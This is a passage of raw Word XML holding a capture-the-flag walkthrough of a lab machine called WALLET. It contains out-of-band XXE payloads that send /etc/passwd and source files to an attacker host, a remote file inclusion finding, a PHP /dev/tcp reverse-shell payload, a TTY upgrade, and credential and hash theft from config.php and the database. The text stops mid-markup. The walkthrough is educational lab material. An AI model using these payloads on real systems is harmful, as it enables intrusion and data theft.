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WALLET machine. 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6700utz0pb5v"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09900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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22 - SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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80 - HTTP</w:t>
        <w:br w:type="textWrapping"/>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start by taking a look at the website running on port 80:</w:t>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41600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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register a new account by clicking </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sign up now</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67000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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registering a new account and logging in, we gain access to the dashboard.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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27300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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going to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reports</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can fill out a form. After submitting it, we intercept the request using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Burp Suite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52700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="76"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54300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="74"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intercepting the request, we can send it to Repeater and click </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Send</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16200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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notice that we do not obtain any output in the response. Since it is an XML request and no output is returned, we can attempt to exploit an </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Out-of-Band XML External Entity (XXE)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For this, we can use the payload below, which will return the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd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file from the remote server </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit.dtd.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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&lt;!ENTITY % vert16x SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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&lt;!ENTITY % param1 "&lt;!ENTITY external SYSTEM 'http://&lt;IP-VPN&gt;:1337/p?data=%vert16x;'&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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&lt;!DOCTYPE foo [ &lt;!ENTITY % pe SYSTEM "http://&lt;IP-VPN&gt;/exploit.dtd"&gt; %pe; %param1; ]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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&lt;foo&gt;&amp;external;&lt;/foo&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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Using a Python server, we can host </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit.dtd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on our local machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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79500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.mkccgp712ve8" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Netcat listener: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092200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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then send our payload.</w:t>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32000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="75"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it, we receive the output in our netcat listener.</w:t>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95400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="73"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decoding the Base64 content, we obtain the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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49600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="77"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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Knowing this, we can read other files from the server. In this case, we will read the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wallet.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit.dtd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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&lt;!ENTITY % vert16x SYSTEM "php://filter/convert.base64-encode/resource=wallet.php"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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&lt;!ENTITY % param1 "&lt;!ENTITY external SYSTEM 'http://&lt;IP-VPN&gt;:1337/p?data=%vert16x;'&gt;"&gt;</w:t>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repeating the process, we obtain the source code of</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wallet.php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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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session_start();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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if(!isset($_SESSION["loggedin"]) || $_SESSION["loggedin"] !== true){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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header("location: login.php");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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exit;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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38">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3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if(isset($_GET['wallets_balance']) and !empty($_GET['wallets_balance'])){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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require_once $_GET['wallets_balance'];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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}else{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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require_once "cryptocurrencies/graphics.php";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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3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3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performing a code review, we can see that there is a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Remote File Inclusion (RFI)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability, since the application performs a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">require_once</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wallets_balance</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter.</w:t>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therefore create a payload that will return a reverse shell once the application includes our remote file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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&lt;?php system("/bin/bash -c 'sh -i &gt;&amp; /dev/tcp/&lt;IP-VPN&gt;/4444 0&gt;&amp;1'"); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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Using a Python server, we can host our file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shell.php</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containing the payload above.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">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y6cuddefhfry" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>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1054100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="59"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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.3yjn0omy0tro" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Netcat listener to receive the connection:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000046">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181100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="61"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87500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="64"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the request, we receive the shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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66800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="60"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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.810tvzmz19f0" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Shell tty</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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a simple shell to a fully interactive TTY:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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python3 -c "import pty;pty.spawn('/bin/bash')"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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4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4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Enter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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5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obtaining a fully interactive shell, we can retrieve our first flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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03300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="70"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Listing the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/home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directory, we notice that there is a user named </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, but we do not have permission to access that user's home directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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939800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="66"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take another approach. By reading the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">config.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file, we obtain the database credentials, which we can use to connect to the database:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">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905000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="78"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both"/>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59">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2222500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="72"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both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>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689100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="63"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Inside the database, we retrieve the password hash for the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user. We can use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">John the Ripper</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
